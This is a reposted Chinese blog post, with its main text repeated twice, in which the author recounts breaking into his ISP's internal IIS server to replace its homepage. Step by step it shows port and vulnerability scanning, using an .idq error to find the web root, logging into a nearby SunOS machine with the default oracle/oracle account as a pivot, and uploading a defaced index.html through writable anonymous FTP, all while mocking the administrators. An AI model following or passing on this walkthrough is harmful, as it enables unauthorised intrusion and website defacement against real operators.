【轉】21和80埠的入侵
首先申明我並不是一個HACKER,只是一個網路安全愛好者罷了。入侵的動機我保留,只記述過程啦!
目標主機:10.75.166.12(我的ISP的真實內部地址)。
目的:更改其WEB頁,還有別的麼?呵呵我保留!
首先:看看這個網段都有那些機子,還有他們都開什麼埠吧!我用scanner(很好的掃描工具)
查出有N部機子。(其實我早就掃過了,呵呵),哈10.75.166.12只開了21,80 兩個埠呀!
先FTP上去羅,ftp 10.75.166.12
unknown ip (10.75.167.87)
connected refused
呵呵,拒絕不知名的IP地址的聯接!faint...該死的網管!
telnet 10.75.166.12 80
從80埠TELNET進去後會出現一段提示,發現該主機用的是MS-IIS!呵呵漏洞好象蠻多的!
IIS5.0有個unicode字符集的漏洞,瀏覽器吧%c1%2f之類的字元解釋成""或“/”之類!
可以訪問一些系統目錄在用CMD。EXE可以執行一些程式,或可提交一些ASP檔案。具體的方法或原理
請自己去找資料學習!我麼?沒用到這個漏洞!那麼這臺機子都有那些漏洞呢?用twwwscan(超好的web
漏洞掃描軟體,是DOS介面的用BORLAND C++寫的,超cool)
廢話少說,twwwscan 10.75.166.12
哦,,,漏洞真不少。呵呵。有如下幾個:
frontpage的_vti_inf.html
newdsn.exe
anything.idq
....
OH!THAT IS ENOUGH!第一個嘛,我們知道它是FRONTPAGE予留的一個HTML檔案,沒什麼用!
第二個嘛, 可在目錄生成MDB檔案,用於D.O.S攻擊,把它的硬碟塞滿麼!!呵呵!對我來說沒有價值
第三個嘛,wow, *.idq這個漏洞我在灌水!棒,在瀏覽器上輸入任何字尾為IDQ的檔案,一般會返回一個類似
: "c:wwwrootshit.idq"not found!
呵呵原來網站放在wwwroot下!
現在問題是10.75.166.12不支援UNKNOW IP!我都要忍不住罵人了!!!
看看剛才掃描過的網段,一個一個telnet再ftp(若開了相應的埠的話)上去,看看有沒有
什麼預設帳號,(若沒有也不要急,小榕的流光2001來看看有沒有弱密碼使用者)
我還是比較幸運的10.75.166.11的21,23埠都開,而且都用SUNOS呵呵!
我們知到預設的使用者oracle的密碼還是oracle。可以用10.75.166.11做跳板了!
笨網管!!!!別怪我了!
telnet 10.75.166.11
login:oracle
password:
welcome!
SUNOS
you have a mail!
oracle@10.75.166.11>
登陸先看看有沒有root!
oracle@10.75.166.11>who
哇,沒有!COOL!該你倒黴!
oracle@10.75.166.11>ftp 10.75.166.12
ok!connected from 10.75.166.11
10.75.166.12 IIS
login:ftp(先試試匿名登陸的許可權麼!)
passwd:ftp@shit.com
ok!XXXX LOGGED IN
FTP>
沒忘把,剛才用*.idq得到的WWWROOT目錄!
FTP>CD WWWROOT
FTP>LS
.
.
.
FTP>
呵呵!看到了INDEX.HTML了!YEAH!!!笨網管,竟然允許匿名訪問這麼重要的目錄!
FTP>bye
BYE-BYE羅!
oracle@10.75.166.11>
再看看許可權如何:隨便PUT一個檔案看看可不可寫!別忘了再刪掉(其實也不用,看你的良心了)
YEAH!可寫呀!!撞大運了!真該今天去買體育彩票!
接下來,把做好的INDEX.HTML先傳到10.75.166.11的目錄下!(用FTP連到10.75.166.11再用ORACLE
帳戶登陸,因為要用10.75.166.11做跳板)
剛才的TELNET程式沒關把!好!看看!
oracle@10.75.166.11>ls
好呀!傳上來了有INDEX.HTML檔案耶!!
接下來,是個人就會了!
oracle@10.75.166.11>ftp 10.75.166.12
ftp>put index.html
ok!
231byte transported
ftp>bye
下面去看看自HACK的頁面吧!
目標主機:10.75.166.12(我的ISP的真實內部地址)。
目的:更改其WEB頁,還有別的麼?呵呵我保留!
首先:看看這個網段都有那些機子,還有他們都開什麼埠吧!我用scanner(很好的掃描工具)
查出有N部機子。(其實我早就掃過了,呵呵),哈10.75.166.12只開了21,80 兩個埠呀!
先FTP上去羅,ftp 10.75.166.12
unknown ip (10.75.167.87)
connected refused
呵呵,拒絕不知名的IP地址的聯接!faint...該死的網管!
telnet 10.75.166.12 80
從80埠TELNET進去後會出現一段提示,發現該主機用的是MS-IIS!呵呵漏洞好象蠻多的!
IIS5.0有個unicode字符集的漏洞,瀏覽器吧%c1%2f之類的字元解釋成""或“/”之類!
可以訪問一些系統目錄在用CMD。EXE可以執行一些程式,或可提交一些ASP檔案。具體的方法或原理
請自己去找資料學習!我麼?沒用到這個漏洞!那麼這臺機子都有那些漏洞呢?用twwwscan(超好的web
漏洞掃描軟體,是DOS介面的用BORLAND C++寫的,超cool)
廢話少說,twwwscan 10.75.166.12
哦,,,漏洞真不少。呵呵。有如下幾個:
frontpage的_vti_inf.html
newdsn.exe
anything.idq
....
OH!THAT IS ENOUGH!第一個嘛,我們知道它是FRONTPAGE予留的一個HTML檔案,沒什麼用!
第二個嘛, 可在目錄生成MDB檔案,用於D.O.S攻擊,把它的硬碟塞滿麼!!呵呵!對我來說沒有價值
第三個嘛,wow, *.idq這個漏洞我在灌水!棒,在瀏覽器上輸入任何字尾為IDQ的檔案,一般會返回一個類似
: "c:wwwrootshit.idq"not found!
呵呵原來網站放在wwwroot下!
現在問題是10.75.166.12不支援UNKNOW IP!我都要忍不住罵人了!!!
看看剛才掃描過的網段,一個一個telnet再ftp(若開了相應的埠的話)上去,看看有沒有
什麼預設帳號,(若沒有也不要急,小榕的流光2001來看看有沒有弱密碼使用者)
我還是比較幸運的10.75.166.11的21,23埠都開,而且都用SUNOS呵呵!
我們知到預設的使用者oracle的密碼還是oracle。可以用10.75.166.11做跳板了!
笨網管!!!!別怪我了!
telnet 10.75.166.11
login:oracle
password:
welcome!
SUNOS
you have a mail!
oracle@10.75.166.11>
登陸先看看有沒有root!
oracle@10.75.166.11>who
哇,沒有!COOL!該你倒黴!
oracle@10.75.166.11>ftp 10.75.166.12
ok!connected from 10.75.166.11
10.75.166.12 IIS
login:ftp(先試試匿名登陸的許可權麼!)
passwd:ftp@shit.com
ok!XXXX LOGGED IN
FTP>
沒忘把,剛才用*.idq得到的WWWROOT目錄!
FTP>CD WWWROOT
FTP>LS
.
.
.
FTP>
呵呵!看到了INDEX.HTML了!YEAH!!!笨網管,竟然允許匿名訪問這麼重要的目錄!
FTP>bye
BYE-BYE羅!
oracle@10.75.166.11>
再看看許可權如何:隨便PUT一個檔案看看可不可寫!別忘了再刪掉(其實也不用,看你的良心了)
YEAH!可寫呀!!撞大運了!真該今天去買體育彩票!
接下來,把做好的INDEX.HTML先傳到10.75.166.11的目錄下!(用FTP連到10.75.166.11再用ORACLE
帳戶登陸,因為要用10.75.166.11做跳板)
剛才的TELNET程式沒關把!好!看看!
oracle@10.75.166.11>ls
好呀!傳上來了有INDEX.HTML檔案耶!!
接下來,是個人就會了!
oracle@10.75.166.11>ftp 10.75.166.12
ftp>put index.html
ok!
231byte transported
ftp>bye
下面去看看自HACK的頁面吧!
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/11411056/viewspace-734405/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- 伺服器80埠和443埠的區別伺服器
- 網站伺服器80埠和443埠的區別網站伺服器
- 如何用nginx在本地把9000埠轉發到80埠上Nginx
- Ubuntu檢視和釋放80埠Ubuntu
- Apache和IIS共享80埠的四個設定方法Apache
- win10 檢視 80埠方法_win10如何檢視80埠Win10
- 443和80埠被佔用win10如何解決_443和80埠被佔用win10怎麼處理Win10
- CactiEZ更改預設80埠
- 雲伺服器Apache和IIS共享80埠的設定方法伺服器Apache
- 在Linux中,如何將本地 80 埠的請求轉發到 8080 埠?當前主機 IP 為10.0.0.104。Linux
- Valet 80 埠被佔用 It works
- dotnet 8 docker 修改8080埠為80Docker
- nginx 80埠監聽多個域名Nginx
- IIS的80埠被佔用怎麼辦呢
- Windows 上使用 PowerShell 設定防火牆規則和埠轉發; Windows 上配置埠轉發,將 3389 埠的流量重定向到自定義埠;Windows防火牆
- Apache配置多個專案公用80埠Apache
- 80埠被system(pid=4)佔用的解決方法
- iis和tomcat同時執行,完美解決80埠衝突問題Tomcat
- 在Linux中,如何將本地80埠的請求轉發到8080埠,當前主機IP為192.168.16.1,其中本地網路卡eth0。Linux
- 玩轉SSH埠轉發
- frp實現內網穿透--支援80埠訪問FRP內網穿透
- windows系統如何解決IIS佔用80埠的問題Windows
- 內網中的埠轉發內網
- win10系統80埠被system佔用怎麼辦_win10系統system程式佔用80埠如何解除Win10
- 沒有部署ingress pod的woker節點telnet slb的80 443埠不通
- 【乾貨】阿里雲ECS無法訪問80埠的解決方法阿里
- nginx小技巧-動態域名(微信,小程式80埠)Nginx
- 阿里雲 CentOS 7 處理80埠開放問題阿里CentOS
- 訪問不了虛擬機器80埠,怎麼回事?虛擬機
- Netweaver的埠號和Spring boot內嵌的Tomcat埠Spring BootTomcat
- Twitter裁80%的工程師,公司照常運轉?工程師
- Linux埠轉發的幾種常用方法Linux
- vbox配置nat網路的埠轉發
- iptables 配置埠及轉發
- Linux-Windows 埠轉發LinuxWindows
- Win10 埠轉發Win10
- ssh埠轉發(ssh隧道)
- Ubuntu檢視埠和釋放埠Ubuntu
- 群暉 Synology 讓出80和443埠 並 使當前使用者能執行docker命令Docker